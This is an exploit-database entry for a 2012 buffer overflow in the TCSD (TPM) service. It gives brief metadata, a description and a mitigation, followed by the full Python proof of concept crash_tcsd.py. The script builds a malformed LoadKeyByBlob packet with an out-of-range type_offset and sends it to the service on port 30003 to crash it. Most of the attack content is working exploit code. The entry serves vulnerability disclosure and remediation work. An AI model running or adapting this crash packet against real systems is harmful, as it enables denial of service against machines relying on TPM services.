crash_tcsd.py

vendor:

TCSD Service

by:

Andy Lutomirski

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: TCSD Service

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

This exploit is a buffer overflow vulnerability in the LoadKeyByBlob function of the TCSD service. It sends a specially crafted packet to the TCSD service, which causes the service to crash due to an invalid type_offset value.

Mitigation:

Disable the TCSD service or upgrade to a version that is not vulnerable.

Source

Exploit-DB raw data:

# crash_tcsd.py
# Copyright (c) 2012 Andy Lutomirski.  All rights reserved.
#
# Permission is granted to anyone to copy and redistribute this file verbatim.
# Permission is *not* granted to distribute modified copies or derivative works.

import struct
import socket
import time

# UnloadBlob_PCR_EVENT also appears buggy.

crasher = struct.pack('>IIIIIII',
                      28, # packet_size = sizeof(tcsd_packet_hdr)
                      11, # ordinal: LoadKeyByBlob
                      1, # num_parms = 1 (so first getData doesn't bail)
                      0, # type_size = 0
                      0x80000000, # type_offset is off in lala land
                      0, # parm_size = 0 (skip checking)
                      28, # parm_offset: see getTCSDPacket
                      )

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
s.connect(('127.0.0.1', 30003))
s.send(crasher)
s.shutdown(socket.SHUT_WR)
s.close()